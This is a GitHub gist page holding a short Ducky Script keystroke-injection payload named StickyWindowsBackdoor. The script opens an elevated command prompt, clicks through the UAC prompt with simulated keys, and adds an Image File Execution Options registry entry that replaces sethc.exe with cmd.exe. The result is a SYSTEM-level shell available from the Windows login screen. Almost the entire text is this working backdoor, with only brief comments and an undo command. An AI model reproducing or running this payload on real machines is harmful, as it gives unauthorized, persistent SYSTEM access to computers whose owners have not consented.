Skip to content

Instantly share code, notes, and snippets.

@JonnyBanana

JonnyBanana/StickyWindowsBackdoor

Created April 17, 2018 03:13
Show Gist options
  • Save JonnyBanana/514a3bb1aa81183c323f6b984ca24f10 to your computer and use it in GitHub Desktop.
Save JonnyBanana/514a3bb1aa81183c323f6b984ca24f10 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
StickyWindowsBackdoor
REM Note: Adjust delays to match host CPU speed
REM To Undo: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
REM Desc: Adds a registry entry to enable the classic sticky keys SYSTEM level cmd backdoor
REM UAC CMD Bypass
DELAY 2000
CONTROL ESCAPE
DELAY 300
STRING cmd
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 600
REM Registry Key Backdoor
STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
DELAY 300
ENTER
DELAY 300
STRING exit
DELAY 300
ENTER
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment